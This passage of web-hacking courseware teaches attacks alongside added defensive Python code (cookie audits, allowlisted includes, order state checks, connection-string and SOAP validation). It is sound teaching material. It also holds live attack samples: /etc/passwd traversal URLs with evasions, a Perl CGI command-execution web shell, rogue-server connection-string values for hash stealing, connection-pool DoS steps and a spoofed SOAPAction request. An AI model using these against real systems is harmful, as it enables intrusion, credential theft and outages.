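The second step above hinges on the cookie's attributes: a session cookie without the Secure flag travels over plaintext HTTP, where it can be sniffed and replayed. The following is an added example, not from the courseware, of the check a defender can run over a login response's Set-Cookie headers. The response headers are constructed for the example; the cookie names are assumptions.

```python
# Constructed Set-Cookie values from a hypothetical login response. The first
# is the weak configuration the text describes (no Secure flag); the last is
# the same kind of cookie set correctly.
RESPONSE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SESSIONID=8f3a1c77d9e04b2a; Path=/"),
    ("Set-Cookie", "prefs=lang%3Den; Path=/; Max-Age=31536000"),
    ("Set-Cookie", "csrftoken=2b7e151628aed2a6; Path=/; Secure; HttpOnly; SameSite=Lax"),
]


def parse_set_cookie(value: str):
    """Split a Set-Cookie value into (name, value, attributes). Attribute
    names are case-insensitive; flag attributes such as Secure map to ''."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name, _, cookie_value = parts[0].partition("=")
    attributes = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attributes[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value, attributes


def audit_cookie(value: str):
    """Return (cookie name, list of weaknesses relevant to token sniffing
    and replay)."""
    name, _, attrs = parse_set_cookie(value)
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure flag: also sent over plain HTTP, where a "
                        "sniffer can read and replay it")
    if "httponly" not in attrs:
        findings.append("no HttpOnly flag: readable by script injected into "
                        "the page")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("no SameSite=Lax/Strict: attached to cross-site "
                        "requests")
    return name, findings


def audit_response(headers):
    """Map every cookie set by the response to its list of findings."""
    report = {}
    for header, value in headers:
        if header.lower() == "set-cookie":
            name, findings = audit_cookie(value)
            report[name] = findings
    return report


if __name__ == "__main__":
    for cookie, findings in audit_response(RESPONSE_HEADERS).items():
        print(cookie, "OK" if not findings else findings)
```

An empty findings list for the session cookie is the pass condition; the Secure flag in particular is what removes the replay path that the sniffing step above relies on.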

- Wireshark

Source: https://www.wireshark.org

Wireshark is a network protocol analyzer that allows attackers to capture and interactively browse network traffic. Wireshark captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks, thus helping attackers sniff session IDs in transit to and from a target web application.

[Screenshot: Wireshark capture of HTTP traffic, showing a POST /index.aspx request and its Cookie header]
[Slides: Perform Injection/Input Validation Attacks (supply crafted malicious input to break the application's normal intended operation; SQL injection, file injection). Perform Local File Inclusion (LFI): LFI vulnerabilities enable attackers to add their own files on a server via a web browser; an LFI vulnerability occurs when an application adds files without proper validation of inputs, thereby enabling the attacker to modify the input and embed path traversal characters; evading added .php and other extensions; bypassing .php execution.]
Perform Injection/Input Validation Attacks

Injection attacks are very common in web applications. They exploit the vulnerable input validation mechanism implemented by the web application. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, LDAP injection, and XPath injection. Another frequently occurring attack is an SQL injection attack.

Injection takes place when a browser sends user-provided data to the interpreter as part of a command or query. For launching an injection attack, attackers supply crafted data that tricks the interpreter into executing unintended commands or queries. Because of these injection flaws, attackers can easily read, create, update, and remove any arbitrary data available to the application. In some cases, attackers can even bypass a deeply nested firewall environment and take complete control of the application and its underlying system.
Injection Attacks/Input Validation Attacks

To perform injection attacks, supply crafted malicious input that is syntactically correct according to the interpreted language being used, to break the application's normal intended operation. Some ways to perform injection attacks are described below:

- Web Scripts Injection: If the user input is used to dynamically execute code, enter crafted input that breaks the intended data context and executes commands on the server

- OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command

- SMTP Injection: Inject arbitrary SMTP commands into applications and SMTP server conversations to generate large volumes of spam email

- SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database

- LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases

- XPath Injection: Enter malicious strings in input fields to manipulate the XPath query so that it interferes with the application's logic

- Buffer Overflow: Inject a large amount of bogus data beyond the capacity of the input field

- File Injection: Inject malicious files by exploiting "dynamic file include" mechanisms in web applications

- Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)" to access restricted directories in the application

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15 SQL Injection
Perform Local File Inclusion (LFI)

Local file inclusion (LFI) vulnerability enables attackers to add their own files on a server via a web browser. Such vulnerability arises when an application adds files without proper validation of inputs, thereby enabling the attacker to modify the input and embed path traversal characters.

LFI vulnerability is often triggered in PHP-based websites. Simple PHP code susceptible to LFI is given below. Attackers can insert the URL parameter into require() without proper validation.

    $file = $_GET['page'];   // attacker-controlled, unvalidated
    require($file);          // includes whatever path was supplied

In this case, an attacker can just insert this string and fetch the /etc/passwd file using the following URL:

    http://xyz.com/?page=../../../../../../etc/passwd

- Evade

In general, .php and other extensions are added to the file using PHP code as follows:

    $file = $_GET['page'];
    require($file . ".php");   // suffix appended after the user-supplied path

Now, .php is appended to the filename, which means the user cannot find the required file because the file /etc/passwd.php does not exist. If an attacker tries to insert a null byte (%00) at the end of the attack string, the .php can be easily evaded:

    http://xyz.com/?page=../../../../../../etc/passwd%00

Another method to evade the added .php is to add a question mark (?) to the attack string:

    http://xyz.com/?page=../../../../../../etc/passwd?

- Bypassing .php execution

An LFI vulnerability can read .txt files but not .php files, because .php files are executed by the server and their content comprises code rather than being returned as text. This can be evaded using a built-in php filter as follows:

    http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=index

Here, the php filter is used to convert everything into the Base64 format. Now, the entire page is Base64-encoded, which can be decoded and saved in a text file and executed:

    base64 -d savefile.php
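Every variant above (traversal, the %00 and ? suffixes, the php:// wrapper) works because the include path is derived from the request value. The fix is to derive it from an allowlist instead. The following is an added example written in Python rather than the courseware's PHP, and it is not code from the courseware: resolve_page() maps the ?page= parameter to a file only when the name is an exact allowlisted entry, and then confirms the canonical path still lies inside the pages directory. PAGES_DIR and ALLOWED_PAGES are hypothetical; SAMPLE_REQUESTS reuses the request values shown above.

```python
from pathlib import Path
from urllib.parse import unquote

# Hypothetical layout: page templates live under this directory and only the
# names below may ever be included.
PAGES_DIR = Path("/var/www/app/pages")
ALLOWED_PAGES = frozenset({"home", "about", "checkout"})


def resolve_page(raw_param: str, pages_dir: Path = PAGES_DIR,
                 allowed=ALLOWED_PAGES):
    """Map the ?page= parameter to a file to include, or None to refuse.

    The decision is an exact match against an allowlist, so traversal
    sequences, an appended %00 or '?', and php:// wrapper URLs never reach
    the filesystem at all; the ".php" suffix is added only after that."""
    page = unquote(raw_param)  # the web server hands the handler the decoded value
    if page not in allowed:
        return None
    candidate = pages_dir / f"{page}.php"
    # Defense in depth: even with a mistaken allowlist entry, refuse anything
    # whose canonical path escapes the pages directory.
    try:
        candidate.resolve(strict=False).relative_to(pages_dir.resolve(strict=False))
    except ValueError:
        return None
    return candidate


# The request values shown in the text, plus one legitimate page name.
SAMPLE_REQUESTS = [
    "about",
    "../../../../../../etc/passwd",
    "../../../../../../etc/passwd%00",
    "../../../../../../etc/passwd?",
    "php://filter/convert.base64-encode/resource=index",
]


def decisions(requests=SAMPLE_REQUESTS):
    """Show what each request value resolves to (None means refused)."""
    return {r: resolve_page(r) for r in requests}


if __name__ == "__main__":
    for request, target in decisions().items():
        print(f"{request!r:60} -> {target}")
```

Note that no blocklist of "../", "%00" or "php://" appears anywhere: matching against known page names makes the list of evasion tricks irrelevant, and the containment check catches an allowlist entry that was itself mis-typed as a path.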

[Slide: Attack Application Logic Flaws. Most application flaws occur due to the negligence and false assumptions of web developers; completely examine the web application; use tools such as Burp Suite to manipulate the requests sent to the web application and identify logic flaws for exploitation; retail web application logic flaw exploitation scenario.]
Attack Application Logic Flaws

In all web applications, a vast amount of logic is applied at every level. The implementation of some logic can be vulnerable to various attacks that will not be noticeable. Most attackers mainly focus on high-level attacks such as SQL injection and XSS, since they have easily recognizable signatures. By contrast, application logic flaws are not associated with any common signatures, making them more difficult to identify. Vulnerability scanners cannot identify this type of flaw without manual testing, which enables attackers to exploit such flaws to cause severe damage to web applications.

Most application flaws arise from the negligence and false assumptions of developers. Application logic flaws vary among different types of web applications and are not restricted to a particular flaw. Acquiring knowledge on previously exploited applications with common logic flaws can provide appropriate information on how to approach exploiting flaws in application logic.

A common scenario illustrating the exploitation of application logic flaws by attackers is described below:
Scenario: Identify and exploit logic flaws in retail web applications

In most retail web applications, the process of placing an order includes selecting the product, finalizing the order, providing payment details, and providing delivery details. The developer assumes that any customer would follow all the levels in a sequence as designed. Identify such applications and, using proxy tools such as Burp Suite, attempt to control the requests sent to the web application. Furthermore, attempt to bypass the third stage, i.e., jump from the second stage to the fourth stage by manipulating the requests. This type of attack is called forced browsing. This flaw enables the attacker to avoid paying the product price and receive the product at the delivery address. It can result in severe financial losses if an attacker intends to exploit it on a large scale.
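The developer's false assumption in the scenario is that the client will request the stages in order. The countermeasure is to keep the order's stage on the server and let each request only ask to move one step forward. The following is an added example, not from the courseware, modelling the four-stage checkout as a server-side state machine; the stage names, the PAY action and the HTTP-style status codes are assumptions chosen for the illustration.

```python
from enum import Enum


class Stage(Enum):
    SELECT_PRODUCT = 1
    FINALIZE_ORDER = 2
    PAYMENT = 3
    DELIVERY = 4


# The only legal transitions: each stage is reachable from its predecessor.
NEXT = {
    Stage.SELECT_PRODUCT: Stage.FINALIZE_ORDER,
    Stage.FINALIZE_ORDER: Stage.PAYMENT,
    Stage.PAYMENT: Stage.DELIVERY,
}


class OrderStateError(Exception):
    """Raised when a request asks for a stage the order has not earned."""


class Order:
    """Server-side order record. The client never supplies the stage; it only
    asks to move on, and the server decides from its own stored state."""

    def __init__(self):
        self.stage = Stage.SELECT_PRODUCT
        self.paid = False

    def advance(self, requested: Stage):
        if NEXT.get(self.stage) is not requested:
            raise OrderStateError(
                f"{self.stage.name} -> {requested.name} is not a legal step")
        # Belt and braces: delivery details are refused until payment is
        # recorded, even if the state machine were ever mis-edited.
        if requested is Stage.DELIVERY and not self.paid:
            raise OrderStateError("delivery refused: no payment recorded")
        self.stage = requested

    def record_payment(self):
        if self.stage is not Stage.PAYMENT:
            raise OrderStateError("payment can only be taken at PAYMENT")
        self.paid = True


def handle(order: Order, action: str) -> int:
    """Simulated request handler: 'PAY' records payment, any other action is
    the stage the client asks to reach. Returns an HTTP-like status."""
    try:
        if action == "PAY":
            order.record_payment()
        else:
            order.advance(Stage[action])
    except KeyError:
        return 400  # unknown stage name
    except OrderStateError:
        return 409  # request conflicts with the order's real state
    return 200


def run(actions):
    """Play a sequence of client actions against a fresh order."""
    order = Order()
    return [handle(order, a) for a in actions]


if __name__ == "__main__":
    print("honest  :", run(["FINALIZE_ORDER", "PAYMENT", "PAY", "DELIVERY"]))
    print("forced  :", run(["FINALIZE_ORDER", "DELIVERY"]))
```

The forced-browsing request (jumping from FINALIZE_ORDER straight to DELIVERY) is refused with 409 regardless of how the client built the request, because the decision depends only on state the client cannot edit.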

Figure 14.75: Screenshot displaying web application logic flaw exploitation

[Slide: Attack Shared Environments. A malicious client of the service provider may try to compromise the security of another organization's web application, or a client may deploy a vulnerable web application that exposes the web infrastructure and compromises the web applications of other organizations; attacks on the access mechanism; attacks between applications.]
Attack Shared Environments

Nowadays, organizations leverage third-party service providers for hosting and maintaining their web applications and relevant web infrastructure. These service providers provide services to multiple clients and host their web applications in parallel using the same infrastructure. This approach leads to many threats and attacks against web applications. For example, a malicious client of the service provider may try to compromise the security of another organization's web application, or a client may deploy a vulnerable web application that paves the way to compromise other organizations' web applications. The following attacks can be performed on shared environments:

- Attacks on the access mechanism

The application service provider provides an administrative web interface to the organizations for configuring and managing the web application and its database from a remote location. This remote access mechanism is vulnerable to various attacks.

  - Check whether the remote access mechanism has any unpatched vulnerabilities or configuration errors that can be exploited. Attackers exploit such vulnerabilities to capture credentials and gain access to the web application and its database

  - Check whether the access privileges are properly separated between clients. For example, a poor configuration may give customers shell access instead of file access. This may allow attackers to access sensitive files and data stored on the web servers.
- Attacks between applications

Vulnerabilities existing in one web application may allow attackers to execute malicious scripts and compromise the security of other hosted web applications. For example, the following script allows attackers to execute commands remotely:

    #!/usr/bin/perl
    use strict;
    use CGI qw(:standard escapeHTML);

    print header, start_html("");
    if (param()) {
        # The "cmd" parameter is taken straight from the request and run
        # in a shell via backticks: this is the remote command execution.
        my $command = param("cmd");
        $command = `$command`;
        print "$command\n";
    } else {
        # No parameter yet: show the form that submits "cmd".
        print start_form();
        print textfield("cmd");
        print end_form();
    }
    print end_html;

By accessing the abovementioned script over the Internet, attackers can execute OS commands such as whoami. Furthermore, a vulnerable web application can be exploited to compromise the security of other web applications. For example, an SQL injection vulnerability in one application may allow attackers to run arbitrary SQL commands and queries to retrieve data in the shared environment and manipulate the data of other applications.
[Slides: Attack Database Connectivity. Database connection strings are used to connect applications to database engines; example of a common connection string used to connect to a Microsoft SQL Server database; database connectivity attacks exploit the way applications connect to the database instead of abusing database queries. Types of data connectivity attacks: Connection String Injection (in a delegated authentication environment, inject parameters in a connection string by appending them with a semicolon); Connection String Parameter Pollution (CSPP) Attacks (try to overwrite parameter values in the connection string to steal user IDs and hijack web credentials: hash stealing, port scanning, hijacking web credentials); Connection Pool DoS (examine the connection pooling settings of the application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all connections in the pool, causing database queries to fail for legitimate users; ASP.NET default pool size example).]
Attack Database Connectivity

Database connection strings are used to connect applications to database engines. In these attacks, attackers target a database connection that forms a link between a database server and its client software. A web application establishes a connection with the database by providing a driver with a connection string that holds the address of a specific database or server instance and offers user authentication credentials. For example:

    Server=sql_box; Database=Common; User ID=uid; Pwd=password

Attacking data connectivity can result in unauthorized control over the database. Attacks on data connectivity provide attackers with access to sensitive database information. Database connectivity attacks exploit the way in which applications connect to the database instead of abusing database queries. For this purpose, use methods such as connection string injection attack, hash stealing, port scanning, and hijacking web credentials.

The following is an example of a common connection string used to connect to a Microsoft SQL Server database:

    "Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

Data connectivity attacks are of the following types:

- Connection String Injection: In a delegated authentication environment, attackers inject parameters in a connection string by appending them with a semicolon. This can occur when dynamic string concatenation is used to build connection strings according to the user input.

- Connection String Parameter Pollution (CSPP) Attacks: Attackers overwrite parameter values in the connection string.

- Connection Pool DoS: Attackers examine the connection pooling settings of the target application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all the connections in the connection pool, causing database queries to fail for legitimate users.
Connection String Injection

A connection string injection attack occurs when the server uses dynamic string concatenation to build connection strings based on the user input. If the server does not validate the string or escape malicious text and characters, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. Because the connection string is parsed using the "last one wins" algorithm, the injected value substitutes a legitimate value with hostile input.

The connection string builder classes can eliminate guesswork and protect the server from syntax errors and security vulnerabilities. They provide methods and properties corresponding to known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate a synonym into the corresponding well-known key name. The server checks for valid key/value pairs, and an invalid pair throws an exception. In addition, it handles the injected values in a safe manner.

Attackers can easily inject parameters by simply adding a semicolon (";") using connection string injection techniques in a delegated authentication environment. In the following example, the system asks the user to give a username and password for creating a connection string. Here, the attacker enters the password as "pwd; Encryption=off"; this means that the attacker has voided the encryption system. When the connection string is populated, the encryption value will be added to the previously configured set of parameters.

Connection String Parameter Pollution (CSPP) Attacks

The server uses connection strings to connect applications to database engines. Connection string parameter pollution (CSPP) techniques allow an attacker to specifically exploit the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. In CSPP attacks, attackers overwrite parameter values in the connection string to steal user IDs and hijack web credentials.

- Hash Stealing

Replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server and sets the values of username, data source, and integrated security as follows:

    User_Value: ; Data Source = Rogue Server
    Password_Value: ; Integrated Security = true

Thus, the resulting connection string would be:

    Data source = myServer; initial catalog = db1; integrated security=no; User ID=; Data Source=Rogue Server; Password=; Integrated Security=true;

Here, the parameters "Data Source" and "Integrated Security" are overwritten. Thus, the application's built-in drivers will use the last set of values instead of the previous ones. Now, when the application's SQL Server driver tries to connect to the rogue server, the sniffer running on the rogue server sniffs the Windows credentials.
- Port Scanning

Try to connect to different ports by changing the value and seeing the error messages obtained.

Inject
    User_Value: ; Data Source = Target_Server, Target_Port
    Password_Value: ; Integrated Security = true

The resulting connection string would be:

    Data source = myServer; initial catalog = db1; integrated security=no; User ID=; Data Source=Target_Server, Target_Port; Password=; Integrated Security=true;

Here, the connection string will take the last "Data Source" parameter; the web application will try to connect to the "Target_Port" port on the "Target_Server" machine. Thus, you can perform a port scan by noticing the different error messages.

- Hijacking Web Credentials

Try to connect to the database using the web application system account instead of a user-provided set of credentials.

Inject
    User_Value: ; Data Source = Target_Server
    Password_Value: ; Integrated Security = true

The resulting connection string is:

    Data source = myServer; initial catalog = db1; integrated security=no; User ID=; Data Source=Target_Server; Password=; Integrated Security=true;

Here, it overwrites the "integrated security" parameter with a value equal to "true". Thus, it will allow you to connect to the database with the system account with which the web application runs.
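All three CSPP variants, and the connection string injection section before them, rest on two facts: user input is spliced into the string by concatenation, and the driver keeps the last occurrence of a repeated key. The following is an added example, not from the courseware, that makes both facts concrete in Python: a "last one wins" parser, the vulnerable concatenation, a builder-style constructor that refuses delimiter characters, and a duplicate-key check that can be logged as a pollution signal. The rogue values reuse the hash-stealing example above; the server and catalog names come from the page's resulting strings.

```python
class ConnectionStringError(ValueError):
    """A supplied value would change the structure of the connection string."""


# Characters that let a value spill into the next key/value pair.
FORBIDDEN = set(';="\'')


def parse_connection_string(conn: str) -> dict:
    """Parse 'key=value; key=value' the way the drivers described in the text
    do: keys are case-insensitive and the last occurrence of a key wins."""
    params = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            params[key.strip().lower()] = value.strip()
    return params


def duplicated_keys(conn: str) -> set:
    """Keys that appear more than once: the signature of an injected or
    polluted parameter, worth logging before the string reaches a driver."""
    seen, dupes = set(), set()
    for part in conn.split(";"):
        key, sep, _ = part.partition("=")
        key = key.strip().lower()
        if sep and key in seen:
            dupes.add(key)
        if sep:
            seen.add(key)
    return dupes


def build_by_concatenation(user: str, password: str) -> str:
    """Vulnerable pattern from the text: user input spliced in verbatim."""
    return ("Data Source=myServer; Initial Catalog=db1; Integrated Security=no; "
            f"User ID={user}; Password={password};")


def build_with_builder(user: str, password: str) -> str:
    """Builder-style construction: fixed keys come from the application, and
    a value containing ';', '=' or quotes is rejected rather than spliced in.
    (A real builder class would quote such values; rejecting keeps the
    demonstration exact.)"""
    for label, value in (("user", user), ("password", password)):
        if FORBIDDEN & set(value):
            raise ConnectionStringError(
                f"{label} contains a connection-string delimiter")
    pairs = [("Data Source", "myServer"), ("Initial Catalog", "db1"),
             ("Integrated Security", "no"), ("User ID", user),
             ("Password", password)]
    return "; ".join(f"{k}={v}" for k, v in pairs) + ";"


# Constructed inputs taken from the hash-stealing example above.
ROGUE_USER = "; Data Source=Rogue Server"
ROGUE_PASSWORD = "; Integrated Security=true"


if __name__ == "__main__":
    polluted = build_by_concatenation(ROGUE_USER, ROGUE_PASSWORD)
    print(polluted)
    print(parse_connection_string(polluted))   # Data Source is now Rogue Server
    print(duplicated_keys(polluted))           # {'data source', 'integrated security'}
    try:
        build_with_builder(ROGUE_USER, ROGUE_PASSWORD)
    except ConnectionStringError as err:
        print("rejected:", err)
```

Parsing the concatenated string shows why the attack works: the effective Data Source is the attacker's, and Integrated Security flips to true. The builder variant never produces such a string, and duplicated_keys() gives a cheap detection for strings assembled by legacy code that cannot yet be rewritten.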
Connection Pool DoS

Examine the connection pooling settings of the application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all the connections in the connection pool, causing database queries to fail for legitimate users.

For example, by default, in ASP.NET, the maximum number of allowed connections in the pool is 100 and the timeout is 30 seconds. Thus, run 100 queries with an execution time of 30+ seconds within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database-related parts of the application.

[Slide: Attack Web Application Client. Interact with server-side applications in unexpected ways to perform malicious actions against the end users and access unauthorized data: cross-site scripting, redirection attacks, HTTP header injection, frame injection, request forgery attacks, session fixation, privacy attacks, ActiveX attacks.]
Attack Web Application Client

Attacks performed on a server-side application infect the client-side application when the latter interacts with malicious servers or processes malicious data. Attacks on the client side occur when the client establishes a connection with the server. If there is no connection between the client and the server, then there is no risk, because the server cannot pass malicious data to the client.

Consider a client-side attack in which an infected web page targets a specific browser weakness and exploits it successfully. Consequently, the malicious server gains unauthorized control of the client system. Attackers interact with the server-side applications in unexpected ways to perform malicious actions against the end users and access unauthorized data. Some of the methods that attackers use to perform malicious attacks are discussed below.
- Cross-site Scripting: An attacker bypasses the client ID's security mechanism, obtains access privileges, and then injects malicious scripts into the web pages of a website. These malicious scripts can even rewrite the HTML content of the website.

- HTTP Header Injection: Attackers split an HTTP response into multiple responses by injecting a malicious response in an HTTP header. Thus, they can deface websites, poison the cache, and trigger cross-site scripting.

- Request Forgery Attack: In a request forgery attack, attackers exploit the trust of a website or web application in a user's browser. The attack works by including a link on a page, which takes the user to an authenticated website.

- Privacy Attacks: A privacy attack involves tracking performed with the help of a remote site by employing a leaked persistent browser state.

- Redirection Attacks: Attackers develop code and links that resemble a legitimate site that a user wants to visit; however, the URL redirects the user to a malicious website on which attackers could potentially obtain the user's credentials and other sensitive information.

- Frame Injection: When scripts do not validate their input, attackers inject code through frames. This affects all the browsers and scripts that do not validate untrusted input. These vulnerabilities occur in HTML pages with frames. Another reason for this vulnerability is that web browsers support frame editing.

- Session Fixation: Session fixation helps attackers hijack valid user sessions. They authenticate themselves using a known session ID and then use the known session ID to hijack a user-validated session. Thus, attackers trick users and access a genuine web server using an existing session ID value.

- ActiveX Attacks: Attackers lure victims via email or via a link that is constructed such that the loopholes of remote code execution become accessible, allowing the attackers to obtain access privileges equal to those of authorized users.
[Slides: Attack Web Services (web services work atop legacy web applications, and any attack on a web service immediately exposes an underlying application's business and logic vulnerabilities to various attacks). Web Services Probing Attacks (trap the WSDL document and analyze it to determine the application's purpose, functional breakdown, entry points, and message types; create a set of valid requests by selecting a set of operations and formulating request messages according to the XML schema; use these requests to include malicious content in SOAP requests and analyze the errors for deeper understanding). Web Service Attacks: SOAP Injection (inject malicious query strings in the user input field to bypass web services authentication mechanisms and access backend databases; works similarly to SQL injection). Web Service Attacks: SOAPAction Spoofing (the operation executed is included as the first child element of the SOAP body; attackers use tools such as WS-Attacker to manipulate the operation included in the SOAPAction header). Web Service Attacks: WS-Address Spoofing (regular WS traffic between client and server; unrequested SOAP traffic received by the WS client). Web Service Attacks: XML Injection (inject XML data and tags into user input fields to manipulate the XML schema or populate the database with bogus entries). Web Services Parsing Attacks (exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create denial-of-service attacks or generate logical errors in web service request processing: recursive payloads, a SOAP document that contains infinite loops resulting in exhaustion of the DOM parser and CPU resources; oversize payloads, consuming all system resources). Web Service Attack Tools (SoapUI Pro, XMLSpy).]
Attack Web Services

Web applications often use web services to implement particular functionality. If web services integrated within the web applications are vulnerable, the applications themselves become vulnerable, allowing attackers to exploit such applications through the integrated vulnerable web services. Thus, attackers easily target web services. Therefore, compromised web services are a serious security threat.

Web services work atop the legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities to various attacks. Attackers can target web services using various techniques, as web applications make these services available to users through different mechanisms. Hence, the possibility of vulnerabilities increases. Attackers exploit these vulnerabilities to compromise web services.

There are many reasons why attackers target web services. Attackers choose an appropriate attack depending on the purpose of the attack. If attackers merely want to stop a web service from serving intended users, then they can launch a DoS attack by sending numerous requests.


Web Services Probing Attacks

WSDL files are automated documents consisting of sensitive information about service ports, connections formed between two electronic machines, and so on. Attackers can use WSDL probing attacks to obtain information about the vulnerabilities in public and private web services, as well as to perform an SQL attack.

A web service probing attack involves the following steps:

- In the first step, trap the WSDL document from web service traffic and analyze it to determine the purpose of the application, functional breakdown, entry points, and message types

- Create a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML schema that can be submitted to the web service

- Use these requests to include malicious contents in SOAP requests and analyze errors to gain a deeper understanding of potential security weaknesses

Figure 14.78: Web Services Probing attack

Web Service Attacks: SOAP Injection

SOAP is a lightweight and simple XML-based protocol designed to exchange structured and typed information on the web. The XML envelope element is always the root element of a SOAP message in the XML schema. SOAP injection includes special characters such as single quotes, double quotes, semicolons, and so on. The attacker injects malicious query strings in the user input field to bypass web service authentication mechanisms and access backend databases. This attack works similarly to SQL injection attacks.

Figure 14.79: Web Services SOAP Injection attack
Web Service Attacks: SOAPAction Spoofing

Every SOAP request message contains an operation that is executed by the application and is included as the first child element in the SOAP body. When SOAP messages are transmitted using HTTP, an additional HTTP header known as SOAPAction is used. The operation to be executed is included in the SOAPAction header. The header element informs the receiving web service about the operation present in the SOAP body without the need to perform XML parsing. Attackers can exploit this optimization to manipulate the operations included in the SOAPAction headers.

For example, consider a web service that includes two operations, createUser and deleteAllUsers, and is vulnerable to such an attack. Assume that this web service is protected by a gateway and only authorized users who have direct communication with the web service can perform the deleteAllUsers operation. An attacker in front of the gateway can perform a SOAPAction spoofing attack by manipulating the SOAPAction header as follows:

An HTTP request message creating a user:

    POST /service HTTP/1.1
    Host: certifiedHacker
    SOAPAction: "createUser"
    <Envelope>
    <Header />
    <Body>
    <createUser>
    <login>rinnimathews</login>
    <pwd>password</pwd>
    </createUser>
    </Body>
    </Envelope>

The attacker can modify the SOAPAction to "deleteAllUsers", and the gateway passes this message because the SOAP body consists of the createUser operation:

    POST /service HTTP/1.1
    Host: certifiedHacker
    SOAPAction: "deleteAllUsers"
    <Envelope>
    <Header />
    <Body>
    <createUser>
    <login>rinnimathews</login>
    <pwd>password</pwd>
    </createUser>
    </Body>
    </Envelope>
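The gateway in the example is fooled because it authorizes on the SOAPAction header alone. A gateway that also reads the first child of the Body, and rejects the request when the two disagree, is not. The following is an added example, not from the courseware, implementing that check over the two requests shown above (reproduced here as constructed strings with the blank line HTTP requires between headers and body). The verdict values and the handling of URI-style SOAPAction values are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed copies of the two requests shown in the text.
LEGITIMATE_REQUEST = """POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "createUser"

<Envelope>
<Header />
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>"""

# Same body, only the header changed: the spoofed request.
SPOOFED_REQUEST = LEGITIMATE_REQUEST.replace(
    'SOAPAction: "createUser"', 'SOAPAction: "deleteAllUsers"')


def split_http_request(raw: str):
    """Return (headers with lower-case names, body text)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def local_name(tag: str) -> str:
    """Strip a namespace prefix such as {http://...}Body from an element tag."""
    return tag.rsplit("}", 1)[-1]


def declared_operation(headers) -> str:
    """Operation named by SOAPAction. The value may be quoted, or be a URI
    whose last segment is the operation, so keep only the final segment."""
    action = headers.get("soapaction", "").strip().strip('"')
    return action.rsplit("/", 1)[-1].rsplit("#", 1)[-1]


def body_operation(body_xml: str):
    """Operation actually present: the first child element of Body."""
    root = ET.fromstring(body_xml)
    for child in root:
        if local_name(child.tag) == "Body":
            for operation in child:
                return local_name(operation.tag)
    return None


def gateway_decision(raw_request: str):
    """What a non-vulnerable gateway does: compare the header's operation with
    the body's and refuse the request when they disagree. Authorization
    decisions downstream must use the body's operation, never the header."""
    headers, body = split_http_request(raw_request)
    declared, actual = declared_operation(headers), body_operation(body)
    verdict = "accept" if declared == actual else "reject"
    return verdict, declared, actual


if __name__ == "__main__":
    print(gateway_decision(LEGITIMATE_REQUEST))
    print(gateway_decision(SPOOFED_REQUEST))
```

The cost of the check is one XML parse per request, which is exactly the work the SOAPAction optimization was meant to avoid; the example shows that skipping it is what makes the spoofing possible.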
Attackers use tools such as WS-Attacker to perform SOAPAction spoofing:

- WS-Attacker

Source: https://github.com

WS-Attacker is a tool for performing automatic penetration tests of web services. It is an open-source and easy-to-use software solution with multiple plugins for different attack types, and it provides a security checking interface. WS-Attacker provides functionality to load WSDL files and send SOAP messages to the web service endpoints, and can test whether any web service is vulnerable to attacks such as XML signature wrapping, SOAPAction spoofing, and DoS.

Figure 14.80: Screenshot of WS-Attacker
Web Service Attacks: WS-Address Spoofing
WS-Address provides additional routing information in the SOAP header to support asynchronous communication. This technique allows the transmission of web service requests and response messages using different TCP connections. It is essential for long-running service requests where the calculation time of the server-side application exceeds the lifetime of a single TCP connection.
WS-Address includes an optional FaultTo address element for stating an alternative endpoint that is to be used in case of any complications. As the requester selects the endpoint address used in the ReplyTo and FaultTo headers, it is not secured properly against tampering by intermediaries. Although the specification asks to perform digital signatures on these header fields, the values mostly depend on the default setting without any proper security. This causes a vulnerability that can be exploited by the attacker to perform the WS-Address spoofing attack. In the WS-Address spoofing attack, an attacker sends a SOAP message containing fake WS-Address information to the server. The <ReplyTo> header consists of the address of the endpoint selected by the attacker instead of the web service client. The endpoint selected by the attacker receives unnecessary traffic via SOAP messages. Furthermore, the attacker may generate a massive amount of traffic, thus resulting in a DoS attack. Attackers use tools such as WS-Attacker to identify and exploit WS-Addressing spoofing vulnerabilities.

[Figure: regular SOAP traffic between the WS client and the server, alongside unrequested SOAP traffic received by the WS client]
Figure 14.81: Illustration of WS-Address spoofing attack
